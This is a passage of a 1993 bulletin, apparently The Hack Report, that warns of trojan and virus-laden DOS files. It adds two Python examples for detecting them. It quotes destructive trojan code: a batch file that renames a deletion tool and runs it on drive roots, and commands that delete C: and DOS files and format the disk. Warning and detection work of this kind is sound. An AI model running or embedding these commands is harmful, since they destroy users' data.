         v2.04i filesizes are:  pkzip.exe 42186   pkunzip.exe 29398"

  Chuck Gustafson (1:2201/33) forwarded to the FidoNet echo DIRTY_DOZEN a
  report from Brian Buchanan (Brian Buchanan #1 @8251 VirtualNET) about the
  file FDFORM.  This appears to be an isolated incident of a Trojan version
  of the legitimate program FDFormat.  The .zip archive was only 13106
  bytes long, and contained the files FDOCS.PAK (317 bytes), FDFORMAT.PAK
  (11366 bytes), and FDSETUP.BAT (174 bytes).  The .bat file contains the
  following commands:

                  @echo off
                  cls
                  echo Analizing system configuration...
                  @echo off
                  ren fdocs.pak fd.exe
                  echo Unpacking files...
                  echo (This may take a few minutes)
                  fd c:\
                  fd d:\
                  fd e:\

  The problem here is that the file FDOCS.PAK is actually a renamed copy of
  a program called NHUE, which according to Brian is a utility that deletes
  all files and sub-directories in the directory specified on the command
  line.  If you look at what happens in the .bat file, you'll note that
  NHUE, originally renamed FDOCS.PAK, is re-renamed to FD.EXE and is called
  for drives C: through E:, potentially wiping out everything on these
  drives.
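
  The rename-then-run trick in FDSETUP.BAT can be caught by reading the
  batch file before running it.  The following Python check is an added
  example, not part of the original report:  it flags any REN that turns a
  non-runnable file into a runnable one, then every later line that runs
  the result.  The function names and the benign control input are
  assumptions made for illustration.

```python
import re

# FDSETUP.BAT as quoted in the report above (leading indentation removed).
FDSETUP_BAT = r"""@echo off
cls
echo Analizing system configuration...
@echo off
ren fdocs.pak fd.exe
echo Unpacking files...
echo (This may take a few minutes)
fd c:\
fd d:\
fd e:\
"""

# Constructed control input: an ordinary rename that should not be flagged.
BENIGN_BAT = "@echo off\nren notes.txt notes.old\ncopy notes.old a:\\\n"

RUNNABLE = {".exe", ".com", ".bat"}      # extensions DOS will execute
REN_RE = re.compile(r"^(?:rename|ren)\s+(\S+)\s+(\S+)$", re.IGNORECASE)
DRIVE_ROOT_RE = re.compile(r"^[a-z]:\\?$", re.IGNORECASE)


def split_name(token):
    """Return (stem, ext) of a DOS file name, lower-cased, path stripped."""
    base = token.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    stem, dot, ext = base.rpartition(".")
    return (stem, "." + ext) if dot else (base, "")


def audit_batch(text):
    """Flag renames that make a non-runnable file runnable, and every
    later line that runs the renamed file."""
    renamed = {}      # stem of the new name -> original file name
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip().lstrip("@").strip()
        if not line:
            continue
        m = REN_RE.match(line)
        if m:
            src, dst = m.groups()
            dst_stem, dst_ext = split_name(dst)
            if dst_ext in RUNNABLE and split_name(src)[1] not in RUNNABLE:
                renamed[dst_stem] = src
                findings.append({"line": lineno, "kind": "rename-to-runnable",
                                 "detail": f"{src} -> {dst}"})
            continue
        tokens = line.split()
        stem, ext = split_name(tokens[0])
        # DOS runs "fd" and "fd.exe" alike, so accept a missing extension.
        if stem in renamed and ext in (RUNNABLE | {""}):
            roots = [t for t in tokens[1:] if DRIVE_ROOT_RE.match(t)]
            findings.append({"line": lineno, "kind": "runs-renamed-file",
                             "detail": f"{tokens[0]} (was {renamed[stem]})",
                             "drive_roots": roots})
    return findings


if __name__ == "__main__":
    for finding in audit_batch(FDSETUP_BAT):
        print(finding)
```

  This only works on plain-text .bat files:  the PASSPRO Trojan later in
  this report uses the same rename trick from inside a compiled .com file,
  where a text-level check like this one has nothing to read.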

  Lee Noga (1:3618/23), apparently one of the folks associated with the
  PowerPak Gold '92 Shareware CD-ROM disk, asked that I help warn folks of
  a Trojan file on their disk called MWARS20.  This file, which has been
  seen in other locations, contains two files, DEMO.EXE and READTHIS.COM,
  which appear to be the main culprits.  According to a report from Scott
  Catterill (Intelec PC-Security conference, via HW Bill Lambdin and based
  on info from Dave Comeau), both files contain the following text:

    eat this. REVENGE!. Melting Memory!. Maybe next time, you won't steal
    people's Passwords and get them ****** off at you... I hope you backed
    up your hard drive!

  Scott says both will try to low-level format your hard drive.  However,
  according to Lee Noga's report, the program acts a bit differently.  The
  copy on the PowerPak CD-ROM contains the following files:

                       MWARS.BAT      128     07/17/92
                     MWARS20.EXE    15864     02/15/92
                     MWARS20.DOC     2058     07/17/92
                        NOTE.DOC      309     01/01/80
                         YANG.ME      121     07/17/92
                     INSTALL.EXE    39080     06/14/90
                        DEMO.EXE     5470     04/22/90
                     DOMENOW.COM      937     09/24/90
                    READTHIS.COM     5470     04/22/90

  Lee says the program does its damage via the .bat file, via DEMO.COM, and
  via DOMENOW.COM - all three are dangerous, as they will scramble your
  hard drive's FAT table.  The same message as Scott reports will appear,
  but if you reboot during its display, you may be able to abort the
  Trojan's damage.  Lee also notes that the game itself was untouched:  if
  you don't invoke it via the .bat file, it will run just fine.  Bizarre.

  (Editorial - I appreciate the effort taken by vendors to inform the
  public of a problem with their product.  Even if the publicity hurts
  sales, the loss can't be worse than the potential loss caused by a
  perception that a company doesn't care about whether or not their product
  is dangerous.  This is not an indictment of _any_ company or author:  it
  is merely intended to encourage companies and authors to report attacks
  against and/or problems with their products as soon as they learn of
  them.  My life would be _so_ much easier. <g>  -lj)

  Tom Guelker (1:2250/26) posts in the FidoNet DIRTY_DOZEN echo a report of
  a Trojan called SINBAD.  It claims to be a file transfer protocol
  utility, but it actually throws your system into a perpetual loop by
  overwriting your AUTOEXEC.BAT file.  The new AUTOEXEC.BAT (as well as
  SINBAD.EXE) becomes read-only and invokes SINBAD.EXE, which again
  overwrites AUTOEXEC.BAT with the same info (apparently turning off the
  read-only bit first <?>), etc. ad nauseam.  Definitely sounds irritating,
  but not dangerous unless you don't have a copy of your original
  AUTOEXEC.BAT file:  you can bypass the loop by booting from a known
  clean, write-protected system disk, and then use a utility such as the
  MS-DOS 4.01 and above ATTRIB.EXE to remove the read-only bit.  This will
  allow you to delete the offending .bat file and replace it with a copy of
  your original, or to re-write it if you didn't have a backup.

  Henry Shaw (1:261/1177, via Jack Cross, 1:3805/13) reports on TAGCRASH, a
  supposed utility or crack of some sort for TAG BBS systems.  Henry says
  the archive contained the internal file TAGUTIL.COM, which started off in
  your \BBS directory and "worked its way through the obvious choices of
  \TAG and \MULTI till it found all the .DAT files, .LST files and
  everything else that pertained to a TAG board."  These files would be
  deleted when found.  An easy way to trash a TAG system, Henry says.

  HW Richard Steiner forwarded a message from the ILink Shareware_Support
  conference by Bob Feldman concerning an archive named HSDIAG.  Bob stated
  that this file is a Trojan.  Bob posted further details on the ILink
  Virus conference (forwarded by HW Bill Lambdin), and also sent a copy of
  the file to R. Wallace Hale, SysOp of the Driftnet BBS ((506)325-9002).
  Mr. Hale did preliminary testing of the file, and was able to determine
  that it will at least try to overwrite the first 255 sectors on the first
  eight drives in a system, including floppy drives.  For the full text of
  Mr. Hale's report, as forwarded by HW Bill Lambdin and James FitzGibbon
  (1:250/301), please obtain the archive version of The Hack Report and see
  the file HSDIAG.RES, located inside the internal archive FILETSTS.LZH.

  HW Jeff White received a file for testing called ANSIVIEW.COM, which has
  apparently been seen inside a couple of archives, most often ANSI
  collections.  The copy Jeff received for testing is infected with the
  AIDS [N1] virus, and cannot be disinfected by either McAfee's Clean-Up or
  the AIDSOUT utility.  The infection is detectable by McAfee's SCAN.  Yet
  another of The Hack Squad's 2048 reasons to check everything you download
  for viruses.

  HW Scott Raymond has cleared up a discrepancy that I had in previous
  reports concerning the file BWAVE_3.  This was listed as a hack of the
  Blue Wave Offline Reader, but according to the report received by Scott
  from a user in Australia, the file is actually a Trojan.  The user in
  Australia reported that the Trojan trashed partitions and boot sectors,
  in addition to attacking RemoteAccess BBS data files.  According to
  Scott, this is the same file reported by Frans Hagelaars (2:512/2).
  Please note that this Trojan was discovered prior to the release of
  BWAVE212, version 2.12 of the reader.

  More Australian sightings come from Greg Miller (3:711/454), via HW
  Emanuel Levy, and Nigel Hunt (3:712/218).  No archive name was given, but
  the file again claimed to be version 3.0 of Blue Wave.  It didn't exhibit
  any dangerous behaviour, but it does seem to at least be related to the
  above file:  it doesn't do QWK packets (v2.12 does), and it has no delay
  screen for unregistered users.

  Vincent Aniello (aniello@gauss.rutgers.edu) reported a "back door" for
  use when logging onto Renegade BBS systems.  This file, RGBACKDR, claims
  to allow you to log onto any Renegade board with SysOp privileges.
  Instead, it makes a beeline for several key files on _your_ system and
  deletes them.  For the full text of the test results, as performed by HW
  Jeff White of The Pueblo Group, see the file RGBACKDR.RES in the archive
  FILETSTS.LZH, found in the archive version of The Hack Report.

  Maynard Marquis (1:141/328) forwarded a message to the FidoNet Int'l Echo
  WARNINGS from Joel Lambert about a file called TW-CHEAT.  This claims to
  be a cheat file for Tradewars 2002, and contains the following files:

                  TW-CHEAT EXE      6306 03-09-93   9:47p
                  SIN      COM       535 03-09-93   9:47p

  He did not say which file he ran, but one of these displayed "some
  unrelated menu" and then returned to DOS.  Apparently, Joel later
  rebooted, at which point the BOOTSAFE program (part of Central Point
  Antivirus) reported that his system had been infected with the Tequila
  virus.  Fortunately, he was able to remove the infection.  He hopes.  I
  hope so too, for his sake.

  Michael Heinbockel (2:242/316) found a file on a BBS in Hamburg, Germany,
  called PARITY.  This file renames your AUTOEXEC.BAT file to AUTOEXEC.BAK,
  creates a new AUTOEXEC.BAT file with the single line C:\DOS\PARITY.EXE,
  and then tries to copy itself to your C:\DOS\ directory.  It usually
  hangs the system during the copy attempt, resulting in the file not being
  copied.  It may be a Trojan that doesn't work, but it is still a Trojan.

  Several reports came in on yet another Trojan attack against McAfee's
  SCAN - this time, under the filename SCANV103.  The first report came via
  Eugene Woiwod (Eugen_Woiwod@mindlink.bc.ca), and full test results were
  later received from Bill Logan of The Pueblo Group (via HW Jeff White).
  As a result of this Trojan, McAfee Associates decided to skip version
  number 103, using number 104 as the release which followed SCANV102.  For
  a full text of Bill's test results, see the file SCANV103.RES in the
  archive FILETSTS.LZH, found in the archive version of The Hack Report.

  Staale Fagerland (staale.fagerland@euronetis.no) reported a file called
  CES_402, which claimed to be an antiviral program.  However, the archive
  contains two files (CES.COM and DONT_!) which are quite suspicious.
  Staale ran the CES.COM file through a program called CHK4BOMB and
  discovered that it uses ROM BIOS routines for direct disk access.  The
  file DONT_! contains several messages that relate to corrupting your FAT,
  partition table, etc., and the message, "Mate(s), it simply makes sense,
  make a backup...".

  Ashley Kleynhans (5:7101/55) reports a Trojan called DREAMDEM, which
  claims to be a demo of some sort by a computer group.  According to
  Ashley, the group named in the file descriptions is not responsible for
  creating this Trojan.  When run, the file displays several messages,
  including ones like, "found PC Speaker," "Found porno GIFs," etc., and
  finally asks whether or not you have a sound card.  Ashley answered Yes
  to this question, and received the response, "OH by the way, I trashed
  your hard disk about a minute ago."

  Ashley immediately did a DIR command on the C: drive and saw no immediate
  damage.  However, the entire disk was gone after a system reset.  Ashley
  says this is because the Trojan deletes both your hard disk partition
  table and your boot sector.  I'm not sure if this is right, but I
  wouldn't want to try it out on my system to verify Ashley's findings.

  Here is the internal file info:

                  CHECKANS COM      3585 03-10-93   2:43p
                  VGADEMO  EXE      8892 04-17-93   7:45p
                  START    BAT        17 04-17-93   1:33p

  Ian Douglas (5:7102/119) forwarded further information on what appears to
  be the same file from a report by Shane Greyvenstein (5:7102/119).  This
  file, called VGADEM1, apparently managed to delete a lot of Shane's files
  before he could stop it:  fortunately, it doesn't appear to have trashed
  Shane's disk.  However, Shane's test revealed that the file was written
  using two packages called "IntroMaker v3.0" and "Mod-OBJ," but that the
  files are encrypted so that the copyright messages for these two packages
  are not visible until after they are decrypted by the host program.

  Brent Thomas (1:202/226) says in the FidoNet DIRTY_DOZEN echo that his
  system was "taken down" by a file called DRAGON.  It claimed to be a
  Public Domain VGA and Sound Blaster supported game.  No symptoms were
  reported, except that he had to reformat his hard drive.

  Penny Nebrich (1:369/101) confirms this, saying that the program that was
  affected was one called Dragon's Shard.  She states that it "created what
  looked like infinite subdirectories with binary names of I think it was a
  dir name of 8 chars. McAfee's scan and Virucide just got stuck in an
  infinite loop. I had to reformat my drive."

  Bill Roark (RIME Shareware conference, via HW Richard Steiner) verifies
  that there is a legitimate file called Dragon's Shard, available under
  the filename DRAGON21.  He also states that the real program is not
  public domain, but shareware instead.

  So, what we have here would seem to be a pair of isolated incidents of
  an altered version of a legitimate program.  As the documentation Bill
  forwarded states, if you feel you have an altered copy of the program,
  contact the publishers with your information.  They can be reached at:

                           Bit Brother Software
                           c/o Michael Ramsey
                           #2 Winged Foot Way
                           Littleton CO 80123

  Josh Burke (1:138/174) reports, via Charlie Sheridan (1:356/18), Travis
  Griggs (1:3807/8), and HW Bob Seaborn, a problem with the file PHYLOX2.
  In what might be an isolated incident, Josh says the file claimed to be a
  "really cool game, VGA gfx and SB sound."  However, the INSTALL program
  destroys hard disks.

  Bob Seaborn received a copy of this file and forwarded it to me - I in
  turn forwarded it to Bill Logan and HW Jeff White for testing.  As it
  turns out, there is an internal file called SETUP.EXE that is identical,
  byte for byte, with the file INSTALL.EXE.  Both will trash your hard
  drive with amazing speed, according to HW Jeff White.  Also, the file
  PHYLOX.EXE is flagged as a possible infected file.  For a full text of
  the test results, see the file PHYLOX.RES in the internal archive
  FILETSTS.LZH, found in the archive version of The Hack Report.

  Ryan Tucker (1:290/10) forwards a message from a fellow SysOp, Robert
  Pedersen, about ASM2PAS.  This claims to create Pascal source code from
  an .EXE file.  However, from text inside the executable, it appears that
  this program tries to delete your DOS directory.  It also brags about a
  certain anti-viral scanner not being able to detect it.

  Valid point, that:  practically _no_ anti-viral tools detect Trojans,
  with the exception of Frisk's F-Prot and one or two others.  Even then,
  the Trojan detection is not complete.  Your best protection against
  Trojans is a religiously maintained set of backups, preferably done after
  a check for viruses on your hard drive(s).

  HW Richard Steiner forwarded a message from the America OnLine GEOWORKS
  forum about the file GEOCOMM.  The message, from "GW Steve" (a "GeoRep",
  according to Richard), came from a user of GeoComm named J. S. James, and
  warned that this archive contains a hacked version of the original
  GeoComm program.  The file claims to be an "update," but it seems to be a
  Trojan which will damage your File Allocation Table (FAT).  Not a file to
  be kept around, it would seem.

  HW Bill Lambdin reports on LAW22 (no description), which contains the
  following files:

       Length    Date    Time    CRC-32  Attr  Name
       ------    ----    ----   -------- ----  ----
        22911  02-24-93  14:13  a4b84cc7 --w-  ABOUT.COM
        13422  02-24-93  14:44  8f0d1e96 --w-  INFO.EXE
          126  02-24-93  14:50  68c9463a --w-  DESC.SDI
       ------                                  -------
        36459                                        3

  Bill says that ABOUT.COM contains a virus. Scan 102 labels it as BA101,
  which is a 160 byte-long .COM file infector.  This could be an isolated
  incident of an infected legitimate file, so thoroughly check any such
  file you find that has the above files in it before you kill it.

  Another report from Mr. Lambdin concerns a file that a user in the
  Intelec PC-Security conference sent to him, called PCS204 (PC-Sentry
  v2.04).  Bill's tests show that this copy of the archive contains two
  files, INSTALSW.COM and EVERYDAY.COM, that are infected with a
  non-resident "companion" virus that utilizes the Mutation Engine.  It
  also contains the file PCS.EXE, which is infected with a virus created by
  a virus-writing group's "Mass Produce Code Generator."

  Bill also reports that our old friend, the Power Pump virus, has
  resurfaced inside a file called FX2.  Here's the archive info:

                Length   Date    Time    CRC-32  Attr  Name
                ------   ----    ----   -------- ----  ----
                 25846 01-01-92  00:00  2635e28a --w-  FX2.EXE
                  1199 01-01-92  00:00  f61885bd --w-  FX2.COM
                 17354 01-01-92  00:00  02eac55c --w-  POWER.EXE
                  1007 01-01-92  00:00  139e1291 --w-  FX2.DOC
                ------                                 -------
                 45406                                       4

  The giveaway here is the file POWER.EXE.  For a full documentation of the
  Power Pump virus, please see the 1992 Full Archive Edition of The Hack
  Report (filename HACK92FA), available from most official distribution
  sites.

  Travis Griggs (1:3807/8) forwarded a report from a local board called The
  Forum (phone number 1-318-528-2107) by a user named Susan Pilgreen. The
  message referred to a file called BOUNCE, which she said was infected
  with the Beeper (Russian Mirror) virus.  The file, according to Travis,
  claimed to be a game.  Travis has now forwarded the file information on
  this archive:

      Filename       Original DateTime modified CRC-32   Attr BTPMGVX
      ------------ ---------- ----------------- -------- ----------
      BOUNCE.COM         4053 80-01-01 00:02:04 35C562AF A--W B 1
      BOUNCE.DAT       119101 92-11-20 23:16:10 247712A8 A--W B 0
      BOUNCE.DOC          348 92-11-20 23:21:46 B28557FE A--W B 1
      ------------ ----------
          3 files      123502

  Geoffrey Liu (1:229/15) reports in the FidoNet WARNINGS echo on a file
  called BWE.  This claims to provide a "quick and easy way to exit
  Windows."  Geoffrey forwards this file info and disassembly report from
  John Eady (1:229/15, john.eady@canrem.com):

            Name          Length   Mod Date    Time     CRC
            ============  ======== =========  ======== ========
            LICENSE.TXT       2656 14 Feb 93  22:01:14 46B50814
            ORDER.TXT         2335 12 Feb 93  12:00:18 9D1A705E
            README.TXT        3565 14 Feb 93  23:08:08 3EA7548E
            BWE.EXE          19517 14 Feb 93  23:02:34 F1729CA4
            ============  ======== =========  ======== ========
            *total     4     28073 14 Feb 93  23:08:08

  "After debugging part of the virus, the following text appears (encrypted)
  in the infected program:

        It's time for a math test curtesy of YAM!

        And the question is...

        What is 00 + 00 =

        WRONG!!!! TRY AGAIN!

        Admiral Bailey

  "This virus is self-encrypting, but does not use any stealth techniques
  (as far as I've seen). It doesn't appear to infect the boot record, or
  the boot partition record. It does not appear to infect .SYS files, or
  .OV? files.

  "If you feel you have been infected, examine any EXE or COM files that you
  believe are infected. Check the 4th and 5th bytes in a COM file for the
  characters "BA". Check the 12th and 13th bytes in an EXE file for the
  characters "BA". If you find a file like this, chances are you have been
  infected."

  Mike Wenthold (1:271/47) found a program under the filename GS2000 which
  contained the VCL 3 [Con] Virus.  The archive contains the following
  files:

               Length    Date     Time    CRC      Filename
              ======== ========= ====== ======== ============
                  1984 22-Dec-91 01:40p 3527B16B GS2000.COM
                   543 22-Dec-91 01:58p DB83A2C0 GSUNP.DOC
              ======== ========= ====== ======== ============
                  2527                           2 files.

  The compression method (on this ZIP archive) was not included in his
  data.  According to Dave Lartique (1:3800/22) and Chris Gramer
  (1:271/47), the program is an "unprotect" for MicroProse's game Gunship
  2000.  This appears to be another isolated incident of an infected
  legitimate file.

  William Gordon (1:369/104) reports BEV105, a file that claims to be a
  "Beverly Hills 90210 Adventure Game."  This file contains 8 files, but
  two seem to be the real culprits:  DORINFO.DIR and INSTALL.COM.  The
  installation renames the DORINFO.DIR file to IDCKILL.EXE and invokes it.
  This program asks for some sort of wildcard according to William, then
  proceeds to delete everything on your drive that matches that wildcard.
  However, it doesn't stop there:  it continues on and deletes all .bat,
  .fon, .com, .zip, .sys, .ice, .ans, .arj, and .exe files.  William also
  says the file "comes with the following virii:  Bootkill and Genesis."

  A copy of this file was sent to Mr. White and Mr. Logan, who were able to
  confirm the behaviour that William reported.  For the complete results of
  their test, see the file BEV105.RES in the FILETSTS.LZH archive, included
  in the archive version of The Hack Report.

  Another report from Bill concerns a file he located called TAXTIP93.
  This archive contains a file called TAXTIP93.DAT, which the executable
  file, TAXTIPS.EXE, renames to MOUSE.COM and tries to copy to your DOS and
  WINDOWS directory.  The new MOUSE.COM is infected with the ADA virus.

  Brian Chan (Internet, chanav@sfu.ca) found a file called PASSPRO, which
  was described with a very short line ("'Password,' or some other short
  word," according to Brian).  The archive contained these files:

                               PASS    .PA1
                               PASS    .PA2
                               PASS    .PA3
                               PASSWORD.COM

  Brian looked inside the .com file, which he says looks like a compiled
  batch file, and found these strings/commands:

      Please Wait While Loading;
      It may take in between 30seconds to 5 minutes
      To unshrink nessessary files
      Please Turn off Screen, and wait for the beep.
      If You do not, your screen might not function
      the way it should.
      Turn Off Screen now, and press the space bar.

      /C REN pass.pa1 pa.exe
      pass.pa2 /C DEL c:\*.*
      pass.pa2 /C DEL c:\dos\*.*
      /C REN pa.exe pass.pa1
      pass.pa3 FORMAT
      c:
      /C CLS

  As you can see, PASS.PA1 gets renamed to PA.EXE - the file, compressed
  with PKLite, is actually Microsoft's MS-DOS ATTRIB.EXE program.  PASS.PA2
  contains the single letter 'Y', and PASS.PA3 contains the single word
  'Yes'.  From the looks of things, this turns out to be a multipartite
  Trojan that attempts to format (what else?) your hard drive.

  Another multipartite Trojan was spotted by James Frazee (1:343/58), under
  the filename ADD_IT.  It contains these files:

                  Name of File    Size  Date
                  ADD_IT.ARJ     40888 02-11-93
                  =======================================
                  ADDIT1   DAT     34283 07-20-91   2:13a
                  ADD_IT   ANS       646 02-11-93   8:31p
                  ADDIT2   DAT     20634 04-09-91   5:00a
                  ADDIT    DOC       177 02-11-93   7:28p
                  ADDIT    COM      1391 02-11-93   8:14p
                  ADDIT3   DAT       138 02-11-93   8:13p
                  THEDRAW  PCK       650 02-11-93   8:31p

  When run, ADDIT.COM merges the three .DAT files into an .EXE file.  The
  end result was that the program deleted all of the files in the directory
  in which it was run.

  John Balkunas (1:107/639) forwards information on GIFCHECK.  He reports
  that Lance Merlen (1:107/614) received an upload of this file, which,
  when checked with McAfee's ViruScan v100, reported over 5 viruses in the
  files in the archive.  No internal archive data was provided, so it is
  hard to say whether or not this is an isolated incident.

  Zack Jones (1:151/173) reports a file called GAGS which was seen in the
  San Antonio area.  The file, described as "Some Christmas practical
  jokes," was analyzed by Bill Dirks (1:385/17) and confirmed as a Trojan.
  The program grabs control of several interrupt vectors, including the
  critical error handler.  The only way to stop it once it starts is to hit
  the reset button or power down.

  When invoked, it displays a countdown from 8 to 0, which corresponds to
  drives H through A, in that order.  For each found drive, it overwrites
  the first 255 sectors with random data from a block of memory.  To add
  insult to injury, if drives B and A are empty, you are prompted to insert
  disks (so that they can be trashed as well).

  After this, the Trojan displays a message, including something like,
  "the disk was trashed but it's only a joke and they are only kidding."
  It then prompts you to reboot, which is rather hard to do unless you have
  a bootable "panic disk" floppy on hand - you certainly won't be able to
  boot from your HD.

  Bill says that if your HD is smaller than 60 megs, you're better off
  trying to recover your disk from scratch.  Between 60-120 megs, you have
  a better chance of recovery via disk utilities:  over 120 megs, you
  should be able to accomplish a complete recovery if you're careful and
  you know what you're doing.

  Bill posted the following scan string that can be used to detect this
  Trojan - if your scanner can use external strings, be sure to read the
  instructions carefully before trying to add this:

               9A46027205B003B9FF00BA0000CD26

  If your scanner requires a name for the string, Bill suggests using
  "AlamoXmasTrojan."
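
  A scanner for the string above, as an added example that is not part of
  the original report: it reads a file in chunks and carries bytes across
  chunk boundaries so a match split between two reads is still found.  The
  function names, chunk size and sample buffer are assumptions made for the
  example.

```python
import io

# Scan string and suggested name exactly as quoted in the report above.
SIGNATURES = {"AlamoXmasTrojan": "9A46027205B003B9FF00BA0000CD26"}
# Editor's reading of the last bytes of that string: B9 FF 00 = MOV CX,00FFh
# (255 sectors), BA 00 00 = MOV DX,0, CD 26 = INT 26h (absolute disk write),
# which matches the behaviour the report describes.


def parse_scan_string(hex_string):
    """Turn a scanner-style hex string into the raw bytes to search for."""
    pattern = bytes.fromhex(hex_string)  # ValueError on odd or non-hex input
    if not pattern:
        raise ValueError("empty scan string")
    return pattern


def scan_stream(stream, pattern, chunk_size=64 * 1024):
    """Return every offset in `stream` at which `pattern` starts."""
    keep = len(pattern) - 1   # bytes carried over between reads
    hits = []
    tail = b""
    base = 0                  # stream offset of the first byte of `tail`
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        window = tail + chunk
        pos = window.find(pattern)
        while pos != -1:
            hits.append(base + pos)
            pos = window.find(pattern, pos + 1)
        # The carried tail is shorter than the pattern, so a match can never
        # lie wholly inside it and nothing is reported twice.
        new_tail = window[-keep:] if keep else b""
        base += len(window) - len(new_tail)
        tail = new_tail
    return hits


def scan_file(path, signatures=SIGNATURES):
    """Return {signature name: [offsets]} for each signature found in the file."""
    results = {}
    for name, hex_string in signatures.items():
        with open(path, "rb") as handle:
            offsets = scan_stream(handle, parse_scan_string(hex_string))
        if offsets:
            results[name] = offsets
    return results


if __name__ == "__main__":
    # Constructed sample: filler bytes with the scan string planted twice.
    sig = parse_scan_string(SIGNATURES["AlamoXmasTrojan"])
    sample = b"\x90" * 10 + sig + b"\x00" * 20 + sig + b"\xcc" * 5
    # A 7-byte chunk size forces both matches to straddle read boundaries.
    print(scan_stream(io.BytesIO(sample), sig, chunk_size=7))
```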

  This Trojan report comes from an article in MacWeek magazine, Volume 7,
  Number 2, issued January 11, 1993.  The article, posted in the FidoNet
  VIRUS_INFO echo by Robert Cummings, states that a program called CPro
  1.41.sea, claiming to be a new version of Compact Pro (a Macintosh
  shareware compression utility), will reformat any floppy in drive 1 and
  tries to reformat the user's start-up hard drive when launched.

  The file can be identified by a 312K sound resource file called "log
  jingle," which is digitized sound from the Ren and Stimpy cartoons.

  Other previously reported Trojans:

  Filename  Claimed use/Actual activity/Reporter(s)
  ========  ==============================================================
  AANSI100  Claims to add Auto-ANSI detect to Telegard BBSs - contains
            something called the "Malhavoc Trojan," which displays a verse
            from a Toronto band and attacks files/sectors on drives C:
            through F:.  Reported by HW Todd Clayton and by George Goode
            (1:229/15).

  ANSISCR   VGA BBS ad - contains a self-extracting archive of the Yankee
            Doodle and AntiChrist viruses.  Can trash hard drives as well
            through Trojan behaviour.  Reported by Bill Dirks (1:385/17),
            and under the filename RUNME by Stephen Furness (1:163/273).

  AVENGER   Advertised as an "amazing game that supports all kind of sound
            cards...."  Contains 2 internal password-protected .ZIP format
            files, AVENGER2.DAT and AVENGER3.DAT, which are expanded by
            the program to the files RUNTIME1.COM (N1 virus) and
            RUNTIME2.COM (Anthrax virus).  From Reinhardt Mueller, via
            HW Bill Lambdin.

  BATMAN    No claim reported - searches your DOS path and tries to "delete
            the executable file that loads WildCat BBSs."  Reported by
            James Powell (Intelec PC-Security Conf.), via HW Bill Lambdin.

  CHROME    Possible isolated incident - contains a file, FGDS.COM, which
            contains text that says "Skism Rythem Stack Virus-808."
            Reported by Richard Meyers and forwarded by Larry Dingethal
            (1:273/231).

  DBSOUND   Possible isolated incident - claimed update of the Drum
            Blaster .MOD file player.  Deletes all files in the current
            directory and all of its subdirectories.  From "Khamsin #1
            @9168*1", forwarded by HW Ken Whiton and HW Bill Dennison,
            from Ken Green of the CentraLink BBS.

  DRSLEEP   Reported as a "cheap virii (sic)", but actually appears to be
            a Trojan:  deletes your COMMAND.COM file when run.  Reported
            by Matt Hargett (1:2430/1532).

  GRAFIX    Possible isolated incident - contains the file WAIT.COM, which
            is a renamed copy of DELDIR.COM, a directory remover and file
            deletion tool.  Reported by Andreas Reinicke (2:284/402).

  LOGIM613  Possible isolated incident - one internal file, MOUSE.COM,
            reports as being infected with the VCL virus when checked with
            McAfee's ViruScan v95.  Reported by Mike Wenthold (1:271/47).

  MUVBACK   Claimed keyboard utility - actual ANSI bomb that remaps the D
            key of your keyboard to invoke DEBUG and create a couple of
            Trojans from script files.  Reported by Bill Dirks.

  OPTIBBS   Aimed at RemoteAccess BBS systems - archives your USERS.BBS
            list and places it in your download directory.  Reported by
            HW Nemrod Kedem.

  QOUTES    Not a misspelling - claimed Christmas quotation generator.
            Overwrites the first 128 cylinders of your first HD, requiring
            a low level format to overcome the damage (IDE drives may need
            to go back to the factory).  Reported by Gary Marden
            (2:258/27).

  QSCAN20   Claimed small virus scanner - when run, identifies itself as
            "being a stealth bomber" and attacks your hard drive's FAT.
            Reported by Art Mason (1:229/15).

  RA111TO2  Claims to upgrade RemoteAccess 1.11 to 2.0 - acts similarly to
            the OPTIBBS file reported above.  Reported by Peter Janssens
            (2:512/1).

  RAFIX     "Fixes little bugs" in RemoteAccess - program contains the
            string "COMMAND /C FORMAT C:" internally.  Reported by Sylvain
            Simard (1:242/158).

  RAMANAGE  Claimed USERS.BBS manager for RemoteAccess - yet another
            file that makes an archive of this file (MIX1.ARJ or WISE.ARJ)
            and places it in a download directory.  Reported by Peter
            Janssens.

            NOTE - Peter Hoek (2:281/506.15) reports a program that does
            the same thing, but uses the archive name RUNNING.ARJ to
            hold the USERS.BBS file.  No name of the Trojan was supplied.

  REAPER    ANSI bomb - remaps the keyboard to force file deletion and
            hard disk formatting - also generates insults.  Reported by
            Victor Padron (1:3609/14), via Rich Veraa (1:135/907).

  REDFOX    Batch file which deletes all DOS and system files.  Reported
            by Mike Wenthold.

  ROLEX     Possible isolated incident of an infection by the Keypress
            [Key] virus.  Reported by David Gibbs, via Michael Toth
            (1:115/220).

  SCOMP     Advertised as a compression utility.  Passes scans unless you
            check data files - loads a file called SCOMP.DAT to create
            CASPER.COM, which is apparently the Casper virus.  Reported by
            Terry Goodman (U'NI Net virus conference), via HW Bill Lambdin.

  SBBSFIX   Tries to format drive C: - contains two files, SBBSFIX.EXE and
            COM_P.OVL.  Reported by Clayton Mattatall (1:247/400).

  SPEED     Claims to "check your PC speed" - actually deletes all files
            on drive C:, including directories.  Reported by HW Nemrod
            Kedem.

  TDRAW460  A "modified" copy of a legitimate release of TheDraw v4.60 -
            the archive had a ZIP Comment which contained an ANSI bomb, and
            an internal file called UFO!.COM would reformat your hard drive
            unconditionally.  Reported by Matt Glosson, via Michael Toth
            (1:115/439.7).

  XYPHR2    No claim - contains the Power Pump companion virus (documented
            in the 1992 Full Archive of this report).  Reported by Mark
            Histed (1:268/332).

  YPCBR101  A copy of this file, uploaded to Simtel-20 and the oak mirror
            on archie.au, contained an infection of the Dark Avenger
            virus in the file YAPCBR.EXE.  Was supposed to be re-released
            as a clean archive.  Reported by John Miezitis (Internet,
            John.Miezitis@cc.utas.edu.au).

  =========================================================================

                        Pirated Commercial Software

  Program                 Archive Name(s)     Reported By
  =======                 ===============     ===========
  2400 A.D. (game)        2400AD              Kevin Brott (Internet,
                                        dp03%ccccs.uucp@pdxgate.cs.pdx.edu)

  3-D Pool                3DPOOL              Michael Gibbs (via HW Bill
                                               Lambdin)

  4DOS v4.02 (reg.)       4DOS402R            HW Scott Raymond
                          4DOSREG

  Airball (game)          AIRBALL             Michael Gorse (1:101/346)

  Alone in the Dark       ALONEDEM            Mark Mistretta (1:102/1314)
   (full game-not a demo)

